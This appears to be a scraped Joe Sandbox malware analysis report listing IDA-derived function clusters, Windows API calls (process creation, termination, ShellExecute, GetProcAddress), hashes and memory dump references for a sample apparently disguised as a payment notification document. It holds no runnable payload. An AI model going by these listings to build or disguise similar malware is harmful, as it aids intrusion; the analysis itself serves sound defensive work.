                                                                              • String ID:
                                                                              • API String ID: 3008561057-0
                                                                              • Opcode ID: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
                                                                              • Instruction ID: 9851e8442c766ecd1d31806979590e3ba9f7cd9119304149b5d9d581346aa610
                                                                              • Opcode Fuzzy Hash: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
                                                                              • Instruction Fuzzy Hash: DC118B72628205FFDB109FA4CC89FAE7BBDEB86355F104528F485A7210D736A984DB60
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009414FF
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00941506
                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00941515
                                                                              • CloseHandle.KERNEL32(00000004), ref: 00941520
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094154F
                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00941563
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
                                                                              • Instruction ID: dd40a7792ad5668ac93cad282340f008948a32ce0f8f4a4ed221010d4a3ae9b4
                                                                              • Opcode Fuzzy Hash: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
                                                                              • Instruction Fuzzy Hash: 0411F9B2605209EBDF118F98DD49FDE7BADEF48744F044019FA09A2160C3758EA5EB60
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00903379,00902FE5), ref: 00903390
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0090339E
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009033B7
                                                                              • SetLastError.KERNEL32(00000000,?,00903379,00902FE5), ref: 00903409
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: ba0cf1a58a9ef53a08475164bbf1a21df4894ddb0060ff7e3e7731670641e1ef
                                                                              • Instruction ID: 2ef48b7c9f5e9a6fb7882d42adfeae4fb4387374fa7a868910d479f12a87ad13
                                                                              • Opcode Fuzzy Hash: ba0cf1a58a9ef53a08475164bbf1a21df4894ddb0060ff7e3e7731670641e1ef
                                                                              • Instruction Fuzzy Hash: 6B01477322C721BEEA2527747CC67672A9CEF46379320822DF610881F0FF224D416284
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00915686,00923CD6,?,00000000,?,00915B6A,?,?,?,?,?,0090E6D1,?,009A8A48), ref: 00912D78
                                                                              • _free.LIBCMT ref: 00912DAB
                                                                              • _free.LIBCMT ref: 00912DD3
                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DE0
                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DEC
                                                                              • _abort.LIBCMT ref: 00912DF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 3160817290-0
                                                                              • Opcode ID: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
                                                                              • Instruction ID: 1c13220729a4bf92c68932e670ed74ed8364616959261d98f1fdb889071e7856
                                                                              • Opcode Fuzzy Hash: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
                                                                              • Instruction Fuzzy Hash: 01F0A97A7486082BC6123738FD06BDA165D6FC2771F25441CF838961D1EE2488E15160
                                                                              APIs
                                                                                • Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                                • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                                • Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
                                                                                • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00978A4E
                                                                              • LineTo.GDI32(?,00000003,00000000), ref: 00978A62
                                                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00978A70
                                                                              • LineTo.GDI32(?,00000000,00000003), ref: 00978A80
                                                                              • EndPath.GDI32(?), ref: 00978A90
                                                                              • StrokePath.GDI32(?), ref: 00978AA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                              • String ID:
                                                                              • API String ID: 43455801-0
                                                                              • Opcode ID: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
                                                                              • Instruction ID: 16843eb8d3643d2684bba8bf6634e6419f104b7f2462df5efad003d2a79f0b14
                                                                              • Opcode Fuzzy Hash: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
                                                                              • Instruction Fuzzy Hash: 43111B7604414CFFDF129F94DC88EAA7F6DEB08390F008026FA199A1A1C7719D95EFA0
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00945218
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00945229
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00945230
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00945238
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0094524F
                                                                              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00945261
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
                                                                              • Instruction ID: a8e79e19d48490d9fcae84ed130d81d70d2cd9e6ae566b22ea5eb197d702a634
                                                                              • Opcode Fuzzy Hash: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
                                                                              • Instruction Fuzzy Hash: 9E0144B6E04719BBEB105BE59C49E5EBFB8EF48751F044065FA08A7281D6709800DFA0
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
                                                                              • Instruction ID: 14f2f921736c4a5dcc69291dddca9fc84313270fb0c443a6b8bf2e4cf81510d2
                                                                              • Opcode Fuzzy Hash: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
                                                                              • Instruction Fuzzy Hash: 24016CB090275A7DE3008F5A8C85B52FFA8FF19754F00411F915C47941C7F5A864CBE5
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0094EB30
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0094EB46
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0094EB55
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB64
                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB6E
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB75
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
                                                                              • Instruction ID: 5dd85af2c9bc9b242ab2905d3ff9359b59bedfc291e850b54808c25207b2e9a8
                                                                              • Opcode Fuzzy Hash: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
                                                                              • Instruction Fuzzy Hash: 67F03AB3254159BBE7215B629C4EEEF3A7CEFCAB11F00016CF605E1091D7A05A41EAB5
                                                                              APIs
                                                                              • GetClientRect.USER32(?), ref: 00937452
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00937469
                                                                              • GetWindowDC.USER32(?), ref: 00937475
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00937484
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00937496
                                                                              • GetSysColor.USER32(00000005), ref: 009374B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                              • String ID:
                                                                              • API String ID: 272304278-0
                                                                              • Opcode ID: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
                                                                              • Instruction ID: 9b423d4044abf64a70d33b3e0a1a1253786db9518bc33ee00e1a9303da0b3a3b
                                                                              • Opcode Fuzzy Hash: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
                                                                              • Instruction Fuzzy Hash: 3F014F72418219FFDB515FA4DC48BA97BB6FB04311F510168F919A21B1CB312E91BF51
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0094187F
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 0094188B
                                                                              • CloseHandle.KERNEL32(?), ref: 00941894
                                                                              • CloseHandle.KERNEL32(?), ref: 0094189C
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 009418A5
                                                                              • HeapFree.KERNEL32(00000000), ref: 009418AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
                                                                              • Instruction ID: d6169b2d596888b83cda1afb1395608277df9c0f27a95f3f8510b51d1f670831
                                                                              • Opcode Fuzzy Hash: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
                                                                              • Instruction Fuzzy Hash: 3DE0E5B701C101FBEB015FA1ED0C90ABF39FF89B22B508228F22991470CB3294A0EF50
                                                                              APIs
                                                                                • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C6EE
                                                                              • _wcslen.LIBCMT ref: 0094C735
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C79C
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0094C7CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                              • String ID: 0
                                                                              • API String ID: 1227352736-4108050209
                                                                              • Opcode ID: e176c3a67fbffc3cf64f85596ea6acaa31801bade64c7b786c7e0935a530276b
                                                                              • Instruction ID: c8d52c84b7b306cce4ca676622aeeff638cf07c3e1193226cfe6c989629494ad
                                                                              • Opcode Fuzzy Hash: e176c3a67fbffc3cf64f85596ea6acaa31801bade64c7b786c7e0935a530276b
                                                                              • Instruction Fuzzy Hash: 3151EFB161A3419FD7949F28C885F6B77E8EF89324F040A2DF995E32A1DB74D804CB52
                                                                              APIs
                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0096AEA3
                                                                                • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                              • GetProcessId.KERNEL32(00000000), ref: 0096AF38
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0096AF67
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                              • String ID: <$@
                                                                              • API String ID: 146682121-1426351568
                                                                              • Opcode ID: df8183dd0ebac5e8ce60e5d7c9d0540a22de45462a7fb44cb796677d3ab8e287
                                                                              • Instruction ID: cfbad4b00f167b02108afbf53b99f1e83fd0ef9170ec274f571bc23261c93fbb
                                                                              • Opcode Fuzzy Hash: df8183dd0ebac5e8ce60e5d7c9d0540a22de45462a7fb44cb796677d3ab8e287
                                                                              • Instruction Fuzzy Hash: 74715671A00659DFCB14DF59C484A9EBBF4FF09310F048499E816AB2A2CB75ED41CF92
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00947206
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0094723C
                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0094724D
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009472CF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: DllGetClassObject
                                                                              • API String ID: 753597075-1075368562
                                                                              • Opcode ID: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
                                                                              • Instruction ID: 19778c8dc50477840aac7e7da2094d7dec5597f3dd62d06e362b127996564bb2
                                                                              • Opcode Fuzzy Hash: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
                                                                              • Instruction Fuzzy Hash: 714171B1604208DFDB15CFA4C884E9ABBA9EF44314F1480ADBD199F20AD7B4D944CBA0
                                                                              APIs
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973E35
                                                                              • IsMenu.USER32(?), ref: 00973E4A
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973E92
                                                                              • DrawMenuBar.USER32 ref: 00973EA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                              • String ID: 0
                                                                              • API String ID: 3076010158-4108050209
                                                                              • Opcode ID: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
                                                                              • Instruction ID: 5911064d1dded37fa25b8846f694ac9c6b1a3f9b23827ddb4a16630d59770084
                                                                              • Opcode Fuzzy Hash: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
                                                                              • Instruction Fuzzy Hash: 19415976A15209EFDB10DF50D884EAABBB9FF49364F04C12AF909A7250D730AE44EF50
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00941E66
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00941E79
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00941EA9
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2081771294-1403004172
                                                                              • Opcode ID: 6de6a88dfd19a84f550c3d11cdeca91ece7d686f910b0b8e49cb68933f306f90
                                                                              • Instruction ID: c3859a0173b44547a87343a99f75bfd48df52c2b2b7574ed0c0c61910edab79a
                                                                              • Opcode Fuzzy Hash: 6de6a88dfd19a84f550c3d11cdeca91ece7d686f910b0b8e49cb68933f306f90
                                                                              • Instruction Fuzzy Hash: 78213775A00104BADB14AB75DC85CFFB7B8EF82350B104519F815E71E1EB74498A9620
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
